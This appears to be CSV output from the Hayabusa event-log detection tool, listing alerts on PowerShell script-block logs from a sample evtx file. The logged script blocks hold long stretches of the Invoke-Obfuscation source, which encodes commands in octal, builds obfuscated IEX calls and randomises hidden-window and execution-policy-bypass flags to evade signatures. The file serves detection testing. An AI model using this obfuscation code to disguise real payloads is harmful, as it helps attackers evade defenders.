$CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.258 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.258 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"ithout dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. 
$InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. 
$PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.262 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedOctalCommand { <# .SYNOPSIS Generates octal encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedOctalCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedOctalCommand encodes an input PowerShell scriptblock or path as an octal payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. 
.PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedOctalCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonInteractive -NoProfil ""( '127f162f151X164B145f55R110_157@163{164f40n47{110R145{154R154f157{40X127B157{162X154f144L41f47R40L55n106{157{162f145@147X162@157X165n156f144L103L157L154_157f162_40L107f162R145f145f156f73_40@127<162_151{164_145{55B110<157X163f164X40X47_117{142f146_165L163f143@141L164n151_157f156R40_122@157{143X153R163R41_47_40R55R106_157f162f145@147n162{157{165B156X144f103B157{154<157L162<40f107<162<145<145_156'.SPlIt( 'LX@fR_Bn{<' ) |% {( [Char] ([Convert]::ToInt16( ( [String]$_),8 ) )) }) -Join''| Invoke-Expression"" C:\PS> Out-EncodedOctalCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive -PassThru IEX(-Join (( 127 ,162 ,151 ,164 , 145 , 55 ,110, 157, 163 , 164 , 40,47 , 110 , 145 , 154 ,154 ,157,40 , 127 ,157,162 , 154,144, 41 , 47 , 40 ,55 ,106 ,157, 162 , 145 , 147,162,157, 165,156 ,144, 103, 157 ,154, 157,162, 40,107 ,162 , 145 , 145 , 156,73 , 40,127 ,162, 151,164 ,145,55 , 110 , 157,163,164 , 40 ,47,117 ,142,146, 165 ,163 , 143 ,141, 164,151 , 157, 156,40,122 ,157, 143 , 153, 163,41, 47,40 ,55 ,106 , 157, 162, 145,147, 162 , 157,165, 156 ,144, 103 , 157,154,157 , 162,40, 107, 162,145, 145,156)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])})) .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 8 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. 
# Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Octal values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. 
$ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. 
$RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. 
$BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. 
$InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.262 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.262 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedOctalCommand { <# .SYNOPSIS Generates octal encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedOctalCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedOctalCommand encodes an input PowerShell scriptblock or path as an octal payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. 
